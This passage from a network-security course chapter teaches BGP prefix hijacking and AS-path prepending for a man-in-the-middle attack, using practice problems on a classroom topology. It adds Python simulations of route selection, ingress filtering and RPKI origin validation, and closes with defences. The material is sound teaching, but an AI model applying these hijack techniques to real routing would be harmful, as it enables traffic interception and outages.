work in Chapter 16. That is, the PTA had to take four distinct actions in order to deny
you access to the MidTube webserver.
1. Take control of a machine on the network and manipulate its operation.
2. Force the machine to tell the "right" kind of lie.
3. Force the machine to spread the lie around.
4. Force other machines to believe the lie.
The only change from Chapter 16 was the introduction of BGP and
its subsequent manipulation to facilitate the PTA’s objectives. By
generating the appropriate BGP route announcement, the PTA
forced their router to hijack the network prefix belonging to the
MidTube webserver making it look as if this prefix originated
within their own Autonomous System (AS). However, before we
dive into the details of their attack, let’s make sure we have the
correct understanding of where your traffic should go under normal
circumstances.
(Cartoon caption: "Stick 'em up, partner! The Internet is like the Wild West in many ways and I am hijacking your network prefix!")
Practice Problem 18.1
Consider the network diagram and BGP route announcement from Router 5 of AS2005 below. Assuming no local
preferences are set, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at
17.17.200.2?
[Network diagram for Practice Problem 18.1 (figure not reproduced): the EC310 internet of Security Exercise 17 & 18, with AS 2016 (R16, RA, RC, Other USNA Networks, 2.2.2.0/29, 3.3.3.0/30), AS 20 (R20), AS 30 (R30), AS 40 (R40), AS 50 (R50), AS 60 (R60), AS 2005 (R5, 17.17.200.0/24, www.midtube.com at 17.17.200.2), AS 2003 (R3, 21.200.3.0/24, www.pta.net at 21.200.3.2), 4.4.4.0/24, the /30 link networks 7.7.7.0, 8.8.8.0, 9.9.9.0, 12.12.12.0, 13.13.13.0, 14.14.14.0, 15.15.15.0, 16.16.16.0, 18.18.18.0, 19.19.19.0 and 20.20.20.0, and one link left as ?.?.?.?/??. The only announcement shown is Network 17.17.200.0/24, AS-Path 2005, from R5.]
How might the PTA craft a BGP route announcement from Router 3 of AS2003 to alter this behavior? Because all
routers forward packets using the longest prefix match principle, the PTA will force Router 3 to advertise a more specific
network ID (a longer prefix) that still contains the IP address of the MidTube webserver. As each neighboring AS learns of
the new, more specific network prefix, it will apply its own BGP path selection algorithm and forward BGP updates across the
Internet, promulgating the PTA's false information. Note that route selection and forwarding are separate steps: AS-path
length only matters when a router chooses between routes to the same prefix, whereas the forwarding lookup picks the most
specific prefix that matches the destination address, so a /25 beats a /24 no matter how long its AS-path is.
Practice Problem 18.2
What is the first and last IP address of the 17.17.200.0/24 network where the MidTube webserver is located?
(a) First Address:
(b) Last Address:
What network ID and mask should the PTA choose? Are there other options available?
Solution:
What is the first and last address of the false network the PTA advertised?
(a) First Address:
(b) Last Address:
Does the IP address of the MidTube webserver fall within the IP address block that the PTA advertised?
Solution:
Finally, given this false BGP route announcement from Router 3 of AS2003, what path will all packets leaving AS2016 take
in order to reach the MidTube webserver at 17.17.200.2?
[Network diagram for Practice Problem 18.2 (figure not reproduced): the same topology as Practice Problem 18.1 (AS 2016 with R16, RA, RC and Other USNA Networks; AS 20, 30, 40, 50 and 60 with R20, R30, R40, R50 and R60; AS 2005 with R5 and www.midtube.com at 17.17.200.2 in 17.17.200.0/24; AS 2003 with R3 and www.pta.net at 21.200.3.2 in 21.200.3.0/24; the same /30 links), now with two announcements: Network 17.17.200.0/24, AS-Path 2005, from R5 of AS 2005, and the PTA's Network 17.17.200.0/25, AS-Path 2003, from R3 of AS 2003.]
2. Why Does This Work? There are two reasons why prefix hijacking is possible in BGP:
1) There is no method within BGP to authenticate which network prefixes have been allocated to
Autonomous System Numbers (ASNs).
2) There is no method within BGP to authenticate which network prefixes can be originated by an ASN.
This point bears repeating: BGP does not provide a mechanism to authenticate the allocation or origin of a network prefix
and ASN. Instead, AS network operators must trust the network reachability information that other ASes provide,
specifically, where a prefix originates and who it has been allocated to. Without trusting this information, it is impossible to
identify how to reach other networks of interest. This mutual trust defines the nature of Internet routing.
Hopefully, it is clear this issue is of great concern. The security of Internet routing depends on the accuracy, integrity, and
availability of the association between ASNs and the network prefixes they own and advertise. If this information is lost,
corrupted, or destroyed the Internet will fail to function as a whole.
At the start of Part II: The Network (Chapter 11), we saw one example of how devastating this can be. YouTube was
taken off the Internet by the Pakistan Telecommunication Authority on Sunday, February 24, 2008 for about two hours. Similar to
the Professional Teaching Association's actions in Security Exercise 17, the Pakistan Telecommunication Authority
announced a more specific network prefix which contained YouTube's IP address space. The Pakistan Telecommunication
Authority's more specific advertisement created a 'black hole' into which the majority of Internet traffic destined for YouTube
was misdirected. Fortunately, their mistake was not malicious in nature, but that does not mean that others' will not be in the
future.
If Internet routing is so vulnerable, who or what keeps the Internet up and running? The successful reliable operation of
Internet routing is a testament to the many AS network operators responsible for inter-domain routing. In addition, many
others are heavily invested in the development of the Internet and its safe and effective operation. Specifically, the Internet
Engineering Task Force (IETF), an international collection of academic researchers, network operators, equipment
manufacturers, and others has made it their sole mission to simply “make the Internet work better.” To do this, these
volunteers produce engineering documents called Requests For Comments (RFCs) that define the operation of the Internet’s
protocols. Through open dialogue, technical competence, protocol ownership, rough consensus and running code they work
hard to guide the technical architecture and keep the Internet up and running daily. To learn more about the IETF, see
http://www.ietf.org.
3. MidTube is Back! Speaking of up and running, it looks like MidTube is back! Let’s break for Part 1 and Part 2 of the
Security Exercise. After these parts are complete, we’ll return to your regularly scheduled lecture.
Security Exercise 18: Part 1 and Part 2
II. Stealing the Internet: Route Attribute Manipulation
1. Sir/Ma’am, Please Give Me My Password Back Prof. Evil and the PTA are back at their old tricks again! This time,
rather than simply shutting down MidTube, they were able to place themselves between you and the MidTube webserver.
From that vantage point, they observed all traffic destined for 17.17.200.0/24 and identified those who were enjoying
themselves rather than paying attention in class. Let’s take a closer look at how your instructor was able to recover your
MidTube username and password and how BGP enabled this.
Practice Problem 18.3
Consider the network diagram and BGP route announcement from Router 3 of AS2003 below. Assuming no local
preferences are set, for every AS, draw the path that AS would select to reach 17.17.200.2 beginning with the AS router
and ending with the MidTube webserver.
[Network diagram for Practice Problem 18.3 (figure not reproduced): the same topology as Practice Problems 18.1 and 18.2 (AS 2016 with R16, RA, RC and Other USNA Networks; AS 20, 30, 40, 50 and 60 with R20, R30, R40, R50 and R60; AS 2005 with R5 and www.midtube.com at 17.17.200.2 in 17.17.200.0/24; AS 2003 with R3 and www.pta.net at 21.200.3.2 in 21.200.3.0/24; the same /30 links), with two announcements: Network 17.17.200.0/24, AS-Path 2005, from R5 of AS 2005, and Network 17.17.200.0/25, AS-Path 2003-60-2005, from R3 of AS 2003.]
What path will AS60 select in order to reach 17.17.200.2?
Solution:
Why would AS60 choose this path?
Solution:
What does the attacker gain by prepending this AS60 to their route announcement?
Solution:
What path will AS2005 select in order to reach 17.17.200.2?
Solution:
Why would AS2005 choose this path?
Solution:
What does the attacker gain by prepending this AS2005 to their route announcement?
Solution:
What additional actions must the attacker take in order to complete the MITM attack?
Solution:
Finally, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2?
Solution:
There are several elements of this routed wide-area MITM attack that are important to understand:[35]
First and foremost, for it to work, some portion of the Internet must be given up as the back path (i.e., the
'correct' path) to the target. In this example both AS60 and AS2005 fill this role and are deliberately chosen by the PTA
so that the victim's traffic eventually reaches its destination. Consequently, traffic originating from AS60 and AS2005 is
not forced through AS2003, unlike traffic from the other ASes across the EC310 internet. Similarly, on the real Internet, an
attacker needs to plan the back path appropriately. Surprisingly, there are only a small number of ASes to choose from. Although
the Internet continues to grow daily, the number of ASes between any two prefixes is still relatively small. As of October
2014, the average AS path length was 3.7891. That is, the 'diameter' of the Internet is approximately four ASes wide.
Second, this attack combines the use of a more specific network prefix with the modification of BGP route attributes to
control the direction of traffic. The PTA deliberately prepends (i.e., puts in front) its own ASN to the chosen back path,
announcing 2003-60-2005, to take advantage of a distinct feature of the BGP path selection algorithm: an AS will not accept
a route that already includes its own ASN in the path. Recall from Chapter 17 that this feature of BGP is intended to prevent
routing loops. Here, it is twisted for malicious purposes. Of course, once you understand how a lock operates, you realize
there is more than one key that can open the door.
[35] Originally proposed and demonstrated live at DEFCON 16 on 10 August 2008 by Anton (Tony) Kapela and Alex Pilosov.
See https://www.youtube.com/watch?v=S0BM6aB90n8 for more details.
Third, to complete the MITM attack, the attacker must also place a static route within their AS to forward the intercepted
traffic toward the final destination. It is not enough to simply redirect all traffic to the attacker's AS; the attacker's own
router has also learned the more specific prefix it is announcing, so without further action the hijacked packets would have
nowhere to go. The attacker has to connect the forward path to the back path of the final destination, and a static route
provides this connection. A static route is an entry manually configured into a router about the location of a network. When a
router learns about the same network from multiple sources, such as the Open Shortest Path First (OSPF) protocol or a distance
vector protocol, the static route is preferred over the dynamically learned routes (it has a lower administrative distance).
Therefore, the router will use the static route over the other learned routes to reach the same network.
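The following Python model is an added example, not code from the EC310 notes. It implements the selection steps described above and in Security Exercise 17 (loop detection on the AS-path, LOCAL_PREF before AS-path length, prepending on re-advertisement) together with the longest-prefix-match forwarding lookup, then replays the chapter's scenarios: the normal /24 from AS2005 (Questions 12 to 15), the PTA's more specific /25 (Practice Problem 18.2), the prepended path 2003-60-2005 (Practice Problem 18.3), and the LOCAL_PREF case from Part 3 of the exercise. Which neighbour relays each route to R16 and to AS60, the path via AS30 to the PTA network, and the LOCAL_PREF value 200 are assumptions made for illustration; the static route the attacker needs inside AS2003 is not modelled.

```python
"""BGP decision process and longest-prefix-match forwarding (added example,
not code from the EC310 notes).  Models the steps the chapter describes:
discard a path containing our own ASN, prefer highest LOCAL_PREF, then the
shortest AS-path, prepend our ASN when re-advertising, and forward on the
longest matching prefix.  Routes marked "assumed" are constructed; the
notes do not say which neighbour relays them."""
from dataclasses import dataclass
from ipaddress import IPv4Address, IPv4Network, ip_network


@dataclass(frozen=True)
class Route:
    prefix: IPv4Network
    as_path: tuple          # leftmost ASN = neighbour we heard it from
    local_pref: int = 100   # BGP default when no policy applies


class BgpSpeaker:
    def __init__(self, asn, prefs=None):
        self.asn = asn
        self.prefs = prefs or {}   # neighbour ASN -> LOCAL_PREF to assign
        self.rib = {}              # prefix -> candidate routes

    def receive(self, route):
        """Loop detection first: our own ASN in the path means discard."""
        if self.asn in route.as_path:
            return False
        lp = self.prefs.get(route.as_path[0], route.local_pref)
        self.rib.setdefault(route.prefix, []).append(Route(route.prefix, route.as_path, lp))
        return True

    def best(self, prefix):
        """Highest LOCAL_PREF, then shortest AS-path, then a fixed tie-break."""
        cands = self.rib.get(prefix)
        return min(cands, key=lambda r: (-r.local_pref, len(r.as_path), r.as_path)) if cands else None

    def advertise(self, prefix):
        """What peers hear: our best path with our own ASN prepended."""
        b = self.best(prefix)
        return None if b is None else Route(prefix, (self.asn,) + b.as_path)

    def lookup(self, addr):
        """FIB lookup: the longest matching prefix wins, whatever its AS-path."""
        covering = [p for p in self.rib if IPv4Address(addr) in p]
        return self.best(max(covering, key=lambda p: p.prefixlen)) if covering else None


def propagate(asns, route):
    """Relay through a chain of single-router ASes (Q12-Q14): each selects
    the route and prepends its own ASN before passing it on."""
    for asn in asns:
        spk = BgpSpeaker(asn)
        if not spk.receive(route):
            return None
        route = spk.advertise(route.prefix)
    return route

def address_range(prefix):
    """First and last address of a block (Practice Problem 18.2)."""
    return str(prefix.network_address), str(prefix.broadcast_address)

def more_specifics(target, covering):
    """Every prefix longer than `covering` that still contains `target`."""
    return [ip_network(f"{target}/{n}", strict=False) for n in range(covering.prefixlen + 1, 33)]


MIDTUBE = "17.17.200.2"
P24 = ip_network("17.17.200.0/24")     # originated by R5, AS2005
P25 = ip_network("17.17.200.0/25")     # the PTA's more specific

def r16_normal():
    """The /24 reaches R16 through AS50 and then AS30 (SX17 Q12-Q15)."""
    r16 = BgpSpeaker(2016)
    r16.receive(propagate([50, 30], Route(P24, (2005,))))
    return r16.lookup(MIDTUBE).as_path

def r16_hijacked():
    """Practice Problem 18.2: R3 also announces the /25 (assumed relayed by
    R20).  Longest match wins even though the /24 is still in the RIB."""
    r16 = BgpSpeaker(2016)
    r16.receive(propagate([50, 30], Route(P24, (2005,))))
    r16.receive(propagate([20], Route(P25, (2003,))))
    return r16.lookup(MIDTUBE).as_path

def mitm_view(asn):
    """Practice Problem 18.3: the /25 carries the prepended path 2003-60-2005.
    Returns (did this AS accept the /25?, AS-path it uses for MidTube)."""
    legit = {60: (2005,), 2016: (30, 50, 2005)}[asn]
    hijack = {60: (2003, 60, 2005), 2016: (20, 2003, 60, 2005)}[asn]  # assumed relays
    spk = BgpSpeaker(asn)
    spk.receive(Route(P24, legit))
    accepted = spk.receive(Route(P25, hijack))
    return accepted, spk.lookup(MIDTUBE).as_path

def r16_local_pref():
    """SX17 Part 3: ITSD weights AS30 over AS20 for 21.200.3.0/24.  The path
    via AS30 is hypothetical (not in the notes); it is longer yet wins because
    LOCAL_PREF is compared before AS-path length (Question 22)."""
    pta = ip_network("21.200.3.0/24")
    r16 = BgpSpeaker(2016, prefs={30: 200})
    r16.receive(Route(pta, (20, 2003)))
    r16.receive(Route(pta, (30, 50, 40, 2003)))   # hypothetical path
    return r16.lookup("21.200.3.2").as_path[0]
```

Calling mitm_view(60) returns (False, (2005,)): AS60 discards the /25 because its own number is in the path and keeps forwarding straight to AS2005, whereas mitm_view(2016) returns (True, (20, 2003, 60, 2005)), so R16 sends MidTube traffic into AS2003 even though the legitimate /24 is still in its RIB. more_specifics("17.17.200.2", P24) lists the PTA's other options, from the /25 down to a /32 host route; the filtering discussion later in this chapter explains why anything longer than a /24 rarely survives in the global table.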
Fourth, while certainly clever, there is a large signature associated with this kind of attack due to its potential global impact
across the Internet. If it has a significant effect on consumers or providers, network operators usually deal with it as soon as
possible. Thus, attacks typically last from several minutes to a few hours. Still, occurrences are not infrequent. A recent report
commissioned by the FCC estimated that route hijackings or similar BGP incidents occur once or twice per month, but
whether or not the hacker's intentions are malicious is very difficult to ascertain.[36] Interestingly, BGP attacks of a smaller
scale (i.e., dealing with only a handful of prefixes) generally go unnoticed. For example, email spammers commonly hijack
IP address space to send their unwanted traffic and then disappear. Various techniques have been proposed for hiding as
the man in the middle during a routed wide-area attack, but the technical details of their implementation are beyond the scope
of this course.
Finally, the astute midshipmen may realize the aforementioned MITM attack only redirects traffic in the forward direction.
That is, traffic leaving AS2016 destined for the MidTube webserver would be forced through AS2003 while traffic leaving
AS2005 destined for AS2016 would not be forced through AS2003. The MidTube webserver will respond to all web
requests via a separate path chosen by Router 5 of AS2005. For brevity, it is left to the reader to determine the appropriate
BGP route announcement that AS2003 should make to intercept traffic in the reverse direction. See Security Exercise 18
extra credit opportunities for details.
2. Why Does This Work? In addition to the two reasons mentioned previously, there is one more reason why this type of
MITM attack is possible in BGP:
There is no method within BGP to authenticate the route attributes provided by an AS.
This point bears repeating: BGP does not provide a mechanism to authenticate the route attributes associated with the
announcements of an AS. This means that an AS can announce whatever attributes it likes about any network prefix,
regardless of the prefix's origin, including the AS path itself and therefore its length.
As before, this has a significant impact on the security of Internet routing. Not only is it possible for an AS to originate a
network prefix without authorization, but any AS along the path can modify the attributes associated with a network prefix at
any point. Therefore, the security of Internet routing depends on the ability to authenticate the route attributes provided by
an AS.
Practice Problem 18.4
What makes route attribute manipulation possible in BGP?
Solution:
What is required in order to secure Internet routing from route attribute manipulation?
Solution:
In some contexts modification of route attributes is used for good. For example, inflating the AS path length of a network
prefix is a common technique used in traffic engineering. However, as we have just seen, it can also be used for malicious
purposes. This leads us to the final question of the networking section: What solutions are available to secure Internet
routing?
III. The Path Towards Secure Internet Routing
[36] See Secure BGP Deployment Final Report by the FCC's CSRIC III, Working Group 6, March 2013 for more details.
1. The Problem As previously mentioned, the primary vulnerability of the Internet routing system is the lack of a means to
authenticate the ASNs, network prefixes, and route attributes provided by others. Without an objective baseline to compare
against, network operators are left to fend for themselves as to whom and what they believe. This is made more difficult by a
number of other issues:
First, compounding the problem is the fact that the Internet routing system grows on a daily basis. The exponential growth of
the BGP IPv4 routing table is illustrated in Figure 1. The number of active BGP entries (i.e., currently advertised network
prefixes) is on the vertical axis and the date in years is on the horizontal axis. Consider the number of prefixes advertised
today (~520,000) relative to the number of prefixes advertised in 1999 (~70,000). Such nonlinear growth makes the
challenge to sort fact from fiction immense, especially given that any one of these prefixes may be malicious in nature.
Figure 1 – The number of active BGP entries versus the date in years.
Second, exacerbating things further is the fact that the number of ASes in the Internet has also increased linearly over time.
This rate of increase is evidenced by the positive slope of the line in Figure 2. The number of unique ASes is on the vertical
axis and the date in years is on the horizontal axis. Again, when comparing the number of ASes today (~48,660) relative to
the number of ASes in 1999 (~4,400) there is an order of magnitude difference. As more ASes are introduced every day, the
challenge to distinguish between true and false advertised information grows more difficult. If even one AS is successful in
sending malicious information, it could alter the flow of traffic across the entire Internet.
Figure 2 – The number of unique ASes versus the date in years.
Third, who is responsible for the Internet anyway? While the organizations (IANA, IETF, etc.) we have discussed thus far
are heavily involved in making the Internet function better, none of them have the authority to administer punishment for
abuse of the network. Part of the celebrated history of the Internet is its free and open nature in which anyone can connect
and share with others. Moreover, many non-profit organizations, private corporations, and governments wish for it to remain
a free domain and may reject any security solution which does not preserve these principles.
Lastly, when considering any security vulnerability, the financial cost to fix the problem is a considerable factor in driving
how quickly any solution may be adopted. It is one thing to tell all AS network operators to secure their networks, but it is an
entirely different matter to determine who is going to pay for it. Unfortunately, the full details of these policy, financial, and
governmental issues are outside the scope of this course, but nevertheless they have a significant impact on the security of
Internet routing.
2. The Solution There are three technical solutions that AS network operators can use right now to combat the issues which
have been identified in this chapter: 1) Filtering, 2) Internet Routing Registries, and 3) Resource Public Key Infrastructure
(RPKI).[37][38][39] BGP security remains an active area of research and alternative solutions may become available in the future.
Filtering. Best current practices for AS network operators dictate the use of filters at AS borders to reject suspicious route
announcements or alter malicious route attributes. Filters are manually established based on the routing policies of an
organization and are commonly used to: 1) prevent private IP addresses and other special-use addresses from being routed
across the Internet; 2) remove routes with exceptionally long AS paths; 3) limit the number of network prefixes introduced into
the global BGP routing table by mask length (e.g., do not accept or advertise a network more specific than /24); along with
many other purposes. ISPs are able to filter their customers' routes because they usually have direct knowledge of which IP
addresses they have allocated to their customers and which ASes should be announcing those prefixes. Information from stub
ASes can be readily checked because they should have a limited number of advertisements and exchange this
information with only one ISP. The real trouble is introduced not at the 'edge' of the Internet with stub ASes, but by
multihomed and transit ASes, which are farther removed from one another. That is, it is very hard for an ISP to filter the routes
of another ISP that has its own set of customers, policy constraints, and geographic concerns.[40]
It is important to understand that filtering has both a business cost and computational cost associated with it. If an ISP filters
too aggressively, it may prevent customers from reaching legitimate destinations. Unhappy customers could lead to a loss of
revenue. There is also an intensive amount of manual labor required to create and maintain these filters, which also costs an
organization time and money. The routers performing the filtering must also be able to store all of the policies of an
organization along with their routing tables and respond to dynamic changes in the Internet’s topology. As an example of
how frequently Internet routing data can change, consider the peak BGP update rate over a seven-day period in October 2014
shown in Figure 3. At its peak, over 4000 BGP update messages and over 6000 BGP route withdrawals were sent per
second. Each update or withdrawal could cause the BGP path selection algorithm to run against the organization’s policies
and consume a large amount of CPU processing time. To help meet this significant computational demand, routers use a
special type of memory called Ternary Content Addressable Memory (TCAM) which is much more expensive than the
common RAM which we learned about in Chapter 1. Thus, the cost of an individual router increases as the demands of
filtering expand. Hopefully it is clear that the consequences of filtering are significant and that it is not a trivial matter to
implement or maintain.
Figure 3 – Peak prefix update rate per second versus the date in years.
Furthermore, for filtering to work effectively, everyone must do it, and do it with an equally strict level of scrutiny. How
likely do you think it is that all ISPs in all countries will meet the same high standard? If even one falls short, or one router in one
ISP is compromised, a malicious routing entry can corrupt the global BGP table.
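As an added example (not code from the notes or from any router vendor), here is a plain-Python version of the ingress filters listed above, run over constructed announcements: special-use address space, a provider's prefix-list of what it allocated to a customer, an AS-path length bound, and a maximum prefix length that keeps the PTA's /25 out of the table. The policy values (a 50-hop AS-path limit, a /24 maximum) and the customer prefix table for AS2003 are assumptions.

```python
"""Border-router ingress filters of the kinds the chapter lists (added
example, not code from the EC310 notes or any vendor).  Each received
announcement is checked, in order, against: (1) special-use address space
that must never be routed globally, (2) a provider's prefix-list of what it
allocated to a customer, (3) an upper bound on AS-path length, and (4) a
maximum prefix length so the /25 hijack never enters the table.  Policy
values and the customer table are assumed."""
from ipaddress import ip_network

MAX_AS_PATH = 50          # assumed policy value; operators choose their own
MAX_PREFIX_LEN = 24       # the chapter's example: nothing longer than a /24
CUSTOMER_PREFIXES = {     # assumed: what the provider allocated to AS2003
    2003: [ip_network("21.200.3.0/24")],
}


def is_special_use(prefix):
    """Private, loopback, link-local, multicast, reserved: never global."""
    return (prefix.is_private or prefix.is_loopback or prefix.is_link_local
            or prefix.is_multicast or prefix.is_reserved or prefix.is_unspecified)


def allocated_to_customer(neighbour, prefix):
    """True unless `neighbour` is a customer announcing space we never gave it."""
    allowed = CUSTOMER_PREFIXES.get(neighbour)
    return allowed is None or any(prefix.subnet_of(a) for a in allowed)


def filter_announcement(prefix_str, as_path, neighbour=None):
    """Return (accepted, reason) for one announcement.  `neighbour` is the
    peer that sent it; by default the leftmost ASN in the path."""
    prefix = ip_network(prefix_str, strict=False)
    neighbour = as_path[0] if neighbour is None else neighbour
    if is_special_use(prefix):
        return False, "special-use prefix"
    if not allocated_to_customer(neighbour, prefix):
        return False, f"not allocated to customer AS{neighbour}"
    if len(as_path) > MAX_AS_PATH:
        return False, f"AS-path length {len(as_path)} exceeds {MAX_AS_PATH}"
    if prefix.prefixlen > MAX_PREFIX_LEN:
        return False, f"/{prefix.prefixlen} is more specific than /{MAX_PREFIX_LEN}"
    return True, "accepted"


def apply_filters(announcements):
    """Run every (prefix, as_path, neighbour) triple through the filters."""
    return [(p, filter_announcement(p, path, nb)) for p, path, nb in announcements]


# Constructed announcements as a transit router might receive them.
SAMPLE = [
    ("17.17.200.0/24", (30, 50, 2005), 30),        # MidTube, legitimate
    ("17.17.200.0/25", (2003,), 2003),             # the PTA's /25, at its provider
    ("17.17.200.0/25", (20, 2003), 20),            # the same /25, one hop further on
    ("10.0.0.0/8", (20, 2003), 20),                # RFC 1918 space leaking out
    ("21.200.3.0/24", (20,) + (2003,) * 60, 20),   # absurd prepending
]
```

Note the two rejections of the same /25: the provider of AS2003 can stop it with the customer prefix-list because it knows what it allocated, while a router one hop further on has only the generic prefix-length rule to rely on. That is the chapter's point about the edge being easy and transit being hard: an ISP cannot write a prefix-list for another ISP's customers.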
[37] As proposed in A Survey of BGP Security Issues and Solutions by Butler et al., January 2010.
[38] As proposed in the Secure BGP Deployment Final Report by the FCC's CSRIC III, Working Group 6, March 2013.
[39] See RFC 6480 (http://tools.ietf.org/html/rfc6480) for more details.
[40] See "How Egypt did (and your government could) shut down the Internet" for more details
(http://arstechnica.com/tech-policy/2011/01/how-egypt-or-how-your-government-could-shut-down-the-internet/).
Internet Routing Registries. The first efforts to establish a baseline for the Internet routing system are the Internet Routing
Registries (IRRs). The idea behind them is very simple. They are repositories of the IP prefixes, ASNs, routing policy, network
topology, and human points of contact for those ASes which choose to register their information. These databases can be
queried by any AS, through an application separate from BGP, to check the routing information received via BGP.
ASes may use this information to construct their BGP filters in order to screen malicious or erroneous advertisements from
others. Often ISPs will require their customers to register their prefixes in an IRR before the ISP will even announce the
customer's prefix onto the Internet. Again, this solution works well at the 'edge' of the Internet but becomes increasingly
difficult beyond stub ASes, for multihomed and transit ASes.
While this method may be effective, the downside is that these registries are only effective if the registry data is secure,
complete, and accurate, which is currently not guaranteed. 41 Additionally, even the Regional Internet Registries (RIRs) do
not always have accurate records of the organizations and their allocated IP addresses. Over time businesses change
ownership, sub-divide, or enter bankruptcy, invalidating the original IP address allocation data. Additionally, because an
organization’s routing policy and network topology is considered private property, organizations do not have an incentive to
update their information in either the IRRs or with the RIRs. For example, a company like Netflix aims to keep the
information about how it connects with other ISPs private to maintain an advantage over its competitors. Thus, it is
unlikely to update its IRR or RIR information.
Resource Public Key Infrastructure (RPKI). Since the security of Internet routing necessitates secure, complete, and
accurate routing information, the most current ideal solution is the Resource Public Key Infrastructure (RPKI). This was
recently made available by all of the RIRs in 2011.42 Similar to the IRRs, RPKI is a repository of Internet routing
information. The key difference is that it uses the X.509 certificate system to provide cryptographic assurance of:
1. The association between an ASN and the IP prefixes it has been allocated.
2. The association between an ASN and the IP prefixes it is authorized to originate.
This is the same idea as when you establish a secure connection with a website. When the lock icon closes in your browser
and you establish a secure connection with a website, you know that the public key used to transfer the symmetric
encryption key belongs to a particular domain name. With RPKI, a router can likewise know whether the IP prefixes
advertised by an ASN may be originated by that ASN. This point bears repeating:
RPKI only provides cryptographic assurance of the association between 1) an ASN and the IP prefixes it has been
allocated and 2) an ASN and the IP prefixes it is authorized to originate. It accomplishes the second objective through
Route Origin Authorizations (ROAs) which attest to what ASN can originate an IP prefix(es). ROAs are digitally signed by
the prefix owner to certify which ASN may originate that IP address space. Dissimilar to the IRRs, the timeliness of the
information in the RPKI database can be validated by checking a certificate’s expiration date. In fact, there is a direct
mechanism for authorized address holders to revoke certifications to preserve the integrity of the database.
More importantly, notice what is absent in RPKI. There is nothing in RPKI which validates the route attributes, including the
AS path, associated with a BGP route announcement from an AS. Nor does it provide certainty that the AS which has
registered their information used the correct ASN or set of prefixes. Nor does it provide network topology information or
human points of contact as with IRRs. Lastly, it does not mandate that network operators use this information when
constructing their filters. How RPKI is applied is entirely dependent on what AS network operators choose to do with the
information available.
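As an added illustration, not part of the original notes, the Python below applies the two ideas above to announcements modelled on the chapter’s Problem 19: BGP path selection with no local preference (longest prefix, then shortest AS path) and Route Origin Validation of each announcement against ROAs. The ROAs, their max_length values and the RFC 6811 validity states (valid / invalid / not found) are assumptions here; checking the ROA signatures themselves is treated as already done.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional, Sequence, Tuple


@dataclass(frozen=True)
class ROA:
    """Route Origin Authorization: the prefix holder signs 'origin_asn may announce
    this prefix at lengths up to max_length'. Signature checking is assumed done."""
    prefix: str
    max_length: int
    origin_asn: int


@dataclass(frozen=True)
class Announcement:
    """A BGP UPDATE as a router sees it: the prefix plus its AS-Path.
    The leftmost ASN is the neighbor that sent it; the rightmost is the origin."""
    prefix: str
    as_path: Tuple[int, ...]


def origin_asn(ann: Announcement) -> int:
    return ann.as_path[-1]


def rov_state(ann: Announcement, roas: Sequence[ROA]) -> str:
    """Route Origin Validation (assumed RFC 6811 semantics):
    'valid'     - a ROA covers the prefix, names this origin ASN and allows this length
    'invalid'   - ROAs cover the prefix but none match origin and length
    'not_found' - no ROA covers the prefix at all (RPKI says nothing about it)
    Only the origin ASN is checked; the rest of the AS-Path is never inspected."""
    net = ipaddress.ip_network(ann.prefix)
    covering = [r for r in roas if net.subnet_of(ipaddress.ip_network(r.prefix))]
    if not covering:
        return "not_found"
    for r in covering:
        if r.origin_asn == origin_asn(ann) and net.prefixlen <= r.max_length:
            return "valid"
    return "invalid"


def accepted_routes(anns, roas, drop_invalid=True):
    """The filter an operator chooses to apply; RPKI itself mandates nothing."""
    return [a for a in anns if not (drop_invalid and rov_state(a, roas) == "invalid")]


def best_route(dest_ip: str, anns) -> Optional[Announcement]:
    """Path selection with no local preference set: longest prefix match wins,
    then the shortest AS-Path (the tie-break the chapter's problems use)."""
    ip = ipaddress.ip_address(dest_ip)
    candidates = [a for a in anns if ip in ipaddress.ip_network(a.prefix)]
    if not candidates:
        return None
    return min(candidates,
               key=lambda a: (-ipaddress.ip_network(a.prefix).prefixlen, len(a.as_path)))


# Constructed data modelled on Problem 19: AS 40 holds 30.31.32.0/19; Router 50
# announces the more specific 30.31.48.0/20 with a forged AS-Path 50-70-40 that
# still names AS 40 as the origin.
LEGIT = Announcement("30.31.32.0/19", (40,))
HIJACK = Announcement("30.31.48.0/20", (50, 70, 40))
ROA_STRICT = ROA("30.31.32.0/19", max_length=19, origin_asn=40)  # only the /19 itself
ROA_LOOSE = ROA("30.31.32.0/19", max_length=24, origin_asn=40)   # holder allows de-aggregation


def demo():
    """What a router picks for the Midtrest webserver with and without ROV filtering."""
    return {
        "unfiltered_choice": best_route("30.31.51.10", [LEGIT, HIJACK]).prefix,
        "hijack_vs_strict_roa": rov_state(HIJACK, [ROA_STRICT]),
        "hijack_vs_loose_roa": rov_state(HIJACK, [ROA_LOOSE]),
        "filtered_choice": best_route(
            "30.31.51.10", accepted_routes([LEGIT, HIJACK], [ROA_STRICT])).prefix,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

With the strict ROA the more specific /20 is marked invalid and the legitimate /19 is selected; with a loose max_length the forged-path announcement passes origin validation, which is exactly the gap the paragraph above describes.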
The hope is, as trust in RPKI increases, network operators will use it more often to certify their IP resources while furthering
its use in their networks. However, as with any new large scale and complex system, new vulnerabilities may be introduced.
For example, at any time any authorized address holder can revoke the certificates of those whom they have sub-allocated
their address space to. Initially, this method may appear like a smart and convenient method for an ISP to control negligent
or irresponsible customer behavior. However, if an ISP or a country wanted to restrict Internet access for a group of people,
abuse of the RPKI Certificate Revocation List (CRL) could provide a way of doing so.
Practice Problem 18.5
Briefly describe two technical solutions to prevent manipulation of the Internet routing system.
Solution:
Briefly describe the negative and positive consequences of these two solutions for secure Internet routing.
Solution:
41. A Survey of BGP Security Issues and Solutions by Butler et al., January, 2010.
42. Some RIRs began offering RPKI as early as
3. See For Yourself
At this point, we’ll head out on to the real Internet and wrap up Part 3 of the Security Exercise. After the Security Exercise is
done, we’ll complete your regularly scheduled lecture.
Security Exercise 18: Part 3
IV. Conclusion
Communication is an inherently insecure process. It is never a question how to make communication perfectly secure, but it
is a question of how to mitigate the risks to an acceptable level for the parties involved. To help make this fundamental
principle clear, let’s strip away all the complexity in computer communications that we have introduced to date. Hopefully,
we have shown you that complexity (e.g., routers, protocols, networks addressing schemes, etc.) can create vulnerabilities.
However, even the most simplistic forms of communication are still inherently insecure, but to understand how requires a bit
more understanding of how the electromagnetic spectrum works. That is, before we can become a locksmith (of wireless
communication), we need to know a bit more about how the lock (the electromagnetic spectrum) operates.
Problems
1. What is an IP prefix?
   a. The network ID.
   b. 200.15.78.128/25
